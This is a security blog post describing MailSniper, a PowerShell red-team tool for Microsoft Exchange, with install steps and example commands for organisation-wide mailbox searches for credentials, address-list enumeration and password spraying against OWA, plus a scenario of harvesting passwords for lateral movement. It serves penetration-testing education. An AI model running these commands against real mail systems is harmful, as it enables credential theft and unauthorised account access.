Darknet - Hacking Tools, Hacker News & Cyber Security

Darknet is your best source for the latest hacking tools, hacker news, cyber security best practices, ethical hacking & pen-testing.

MailSniper – PowerShell Tool for Exchange Mailbox Search and Credential Discovery

Views: 785

MailSniper is a PowerShell-based penetration testing tool for Microsoft Exchange environments. It enables targeted or mass searches of mailboxes to uncover credentials, insider intelligence, and infrastructure details. Standard users can query their mailbox, while administrators with the **ApplicationImpersonation** role can run organisation-wide searches.

MailSniper – PowerShell Tool for Exchange Mailbox Search and Credential Discovery

This complements darknet.org.uk’s coverage of offensive tooling by extending reconnaissance into the email layer, alongside previously covered post-exploitation frameworks like Nishang and password spraying tools such as TREVORspray.

Key Features

  • Invoke-SelfSearch: Search the current user’s mailbox for defined keywords
  • Invoke-GlobalMailSearch: Use impersonation to search all mailboxes
  • Get-GlobalAddressList: Enumerate email addresses from the Global Address List
  • Get-ADUsernameFromEWS: Map email addresses to Active Directory usernames
  • Invoke-OpenInboxFinder: Identify accessible shared or group mailboxes
  • Password spraying modules for OWA, EWS, and ActiveSync

Installation & Usage

Requirements: Windows with PowerShell and network access to Exchange.

git clone https://github.com/dafthack/MailSniper.git
Import-Module .\MailSniper\MailSniper.ps1

Common usage examples:

# Search current mailbox
Invoke-SelfSearch -Mailbox [email protected]

# Search all mailboxes with impersonation
Invoke-GlobalMailSearch -ImpersonationAccount admin -ExchHostname exchange.domain.local -OutputCsv results.csv

# Enumerate GAL and map usernames
Get-GlobalAddressList -ExchHostname exchange.domain.local -Username [email protected] -Password P@ssw0rd
Get-ADUsernameFromEWS -EmailList .\users.txt

# Password spray against OWA
Invoke-PasswordSprayOWA -ExchHostname exchange.domain.local -UserList .\users.txt -Password Winter2025!

Attack Scenario

In a red team engagement, a tester compromises an account with ApplicationImpersonation rights. Running:

Invoke-GlobalMailSearch -ImpersonationAccount attacker -ExchHostname mail.corp.local -OutputCsv creds.csv

The output reveals passwords, VPN details, and network diagrams sent over email. Coupled with GAL enumeration, the tester now has a user map and live credentials, enabling lateral movement and deeper compromise.

Conclusion

MailSniper brings a targeted, high-value capability to the red team arsenal, turning email systems into an intelligence goldmine. In engagements where Exchange is present, it bridges initial access and lateral movement by uncovering credentials and network insight that would otherwise remain hidden. Paired with password spraying and mailbox enumeration, it can rapidly expand an attacker’s foothold and operational scope.

You can read more or download MailSniper here: https://github.com/security-geeks/MailSniper

Related Posts:

Share
Tweet
Share
Buffer
WhatsApp
Email